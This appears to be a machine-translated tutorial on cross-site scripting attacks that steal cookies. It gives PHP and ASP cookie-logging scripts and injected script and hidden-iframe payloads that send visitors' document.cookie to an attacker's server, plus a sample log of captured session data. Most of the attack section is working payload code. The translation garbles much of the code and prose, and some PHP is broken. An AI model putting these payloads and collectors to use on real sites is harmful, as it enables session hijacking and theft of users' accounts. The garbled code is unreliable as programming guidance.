XSS Cross-Site Use php to get cookies and save them

0x01

0X02 background

0x03 practices

0x04 Operation Problems and Solutions

0x05 ends

--------------------------------------------------------------------

0x01: XSSCross Site Scripting refers to a malicious attacker inserting malicious html code into a Web page (such as Test). When a user browses this page, the html code embedded in the Web may be triggered to achieve the Special Purpose of the inserter.

XSS attacks are divided into two categories,

The first type is internal attacks. It mainly refers to the use of program vulnerabilities to construct cross-site statements.

The other type is external attacks. It mainly refers to the Construction of XSS Cross-Site vulnerability web pages or the search for webpages with cross-site vulnerabilities other than the target machine. XSS is the same as SQL Injection defense. XSS attacks are also caused by the negligence in writing Web pages. Therefore, there is also a way to avoid XSS attacks from the perspective of Web application development.

0x02:I have encountered XSS reflection and XSS warehouse receiving

The XSS reflected type is also called the non-persistent type, which means we insert our own code through URL construction.

For ex: http://Www.C.Com/index.asp? Name =<Script> alert ('xss') </script>

In this way, you do not need to save the self-constructed link and wait for some people to trigger it.

The XSS warehouse receiving model is also called a persistent model. It is persistent and persistent...

For ex: may appear in the personal information of registered users on some websites. Or a Text box ....

-----------------------------------

Common Code

<Script> alert (document. cookie) </script>
<Script> alert ('C') </script>

------------------------------------

I want to know about it recently. After testing, it was finally executed successfully.

-------------------------------------

XSS has many advanced applications. The example below demonstrates how to obtain a cookie.

---------------------------------------

0x03:

Website A www.a.com // has persistent XSS uncontrollable drops

Website B www. B .com // store your own cookies. The script can be controlled.

I have a lot of online materials, but most of them are yours. What's worse is that during the reprinting process, the website may be restricted, and other problems such as escape character replacement and garbled characters.

As a result, the script cannot run normally, and it does not give a source of the original text. It is also shameful to install the original text.

It is relatively simple to obtain pages visible on the Internet. ASP and PHP scripts are sufficient.

• ASP version

• <%
  Msg = Request. ServerVariables ("QUERY_STRING ")
  Testfile = Server. MapPath ("cook.txt ")
  Set fs = server. CreateObject ("scripting. filesystemobject ")
  Set thisfile = fs. OpenTextFile (testfile, 8, True, 0)
  Thisfile. Writeline ("" & msg &"")
  Thisfile. close
  Set fs = nothing
  %>

•  

• 
  PHP code:
  <? Php
  $ Cookie = $ _ GET ['C'];
  $ Ip = getenv ('remote _ ADDR ');
  $ Time = date ("j F, Y, g: I ");
  $ Referer = getenv ('HTTP _ referer ');
  $ Fp = fopen('cook.txt ', 'A ');
  Fwrite ($ fp, 'cookie :'. $ cookie. '<br> IP :'. $ ip. '<br> Date and Time :'. $ time. '<br> Referer :'. $ referer. '<br> ');
  Fclose ($ fp );
  ?>

•  

Most of them save it as 1.php and then save it to their own space.

Http://www. B .com/1.php

Http://www. B .com/1.asp

 

Enter

<Script> document. location = "http: // www.2cto.com/1.php? C = "+ document. cookie; </script>

Or

<Script> document. location = "http://www. B .com/1.asp? Msg = "+ document. cookie; </script>

 

Although the filtering is not strict, it may lead to various forms of XSS, but the text box length may not be so long or the <script> </script> tag is disabled and filtered out.

 

0x04

The test shows that if the length exceeds the upper limit, the database cannot be imported into the database, and the XSS is unavailable.

If you use an HTM or HTML file

Then the obtained cookies are www. B .com, not A, because they first get B from A and then get cookies from B.

1) www.a.com/xss.asp 2) Cross-Site www. B .com/1.html 33661.html ---> www. B .com/1.php 4) to obtain cookies of B

 

Obviously, we have lost the original intention and significance of getting cookies from A, because at least B is self-controllable and A wants to be controllable.

 

I thought that only one php page has no parameters and does not need to be obtained with document. cookie. Because you do not understand php, you can modify a copy of the code on the Internet to directly obtain it. The parameter name or something may not be very standard.

I don't even know what ASP ASPX JSP prel python is. You are welcome to correct or provide a more efficient script.

 

• <? Php
  $ Ch = curl_init ();
  $ Ip = getenv ('remote _ ADDR ');
  $ Time = date ("Y-m-d G: I: s ");
  $ Referer = $ _ SERVER ['HTTP _ referer'];
  $ Agent = $ _ SERVER ['HTTP _ USER_AGENT '];
  Curl_setopt ($ ch, CURLOPT_URL, 'HTTP: // www.a.com ');
  Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
  Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
  Curl_setopt ($ ch, CURLOPT_NOBODY, false );
  Time () + 94608000; // This indicates that cookies will not expire within three years, but I don't know if it makes sense.
  $ Rs = curl_exec ($ ch );
  Preg_match_all ('/Set-Cookie: (. +) = (. +) $/m', $ rs, $ regs );
  Foreach ($ regs [1] as $ I => $ k)
  $ Fp = fopen('C.html ', 'A ');
  Fwrite ($ fp, 'K :'. $ k. '<br> IP :'. $ ip. '<br> Date and Time :'. $ time. '<br> Referer :'. $ referer. '<br> agent :'. $ agent. '<br> ');
  Fclose ($ fp );
  Curl_close ($ ch );
  ?>

•  

Then use the <iframe> </iframe> label

<Iframe src = "http://www. B .com/1.php"; // adjust the frame size if the condition is ripe and the length limit of the text box is not strict

<Iframe src = http://www. B .com/1.php width = 0 height = 0> </iframe> otherwise there will always be a slap in the box ....

<Script> document. location = "http://www. B .com/1.php? C = "+ document. cookie; </script>

In this way, using the <iframe> label is much shorter than using the <script> tag with parameter call to obtain cookies. And the accuracy is much higher.

Of course, you still need to decide based on the actual situation. You may not use <iframe> or restrict the use range of <iframe> on the page...

 

----------------

Get result reality

 

K: aspsexxxxxxxxxqasca = BOHJNXXXXXXXXXXXXXNFFAOLCGKC; path
IP: 1x0. 45.1X9.105
Date and Time: 2012-00-00 00:00:51
Referer: http://www.a.com/xss.asp
Agent: Mozilla/7.0 (linux 2.6.18) AppleWebKit/516.11 (KHTML, like Gecko) Chrome/21.0.1142.57 Safari/516.11

 

========================================================== ======================================

0X05 a summary does not like Do not spray welcome correction common progress.

This is just a small test completed in a specific context. It may be the opposite if you leave the original background, but if it is incorrect, it indicates that this is an independent background. It is irresponsible to use a php script to obtain cookies. For yourself and others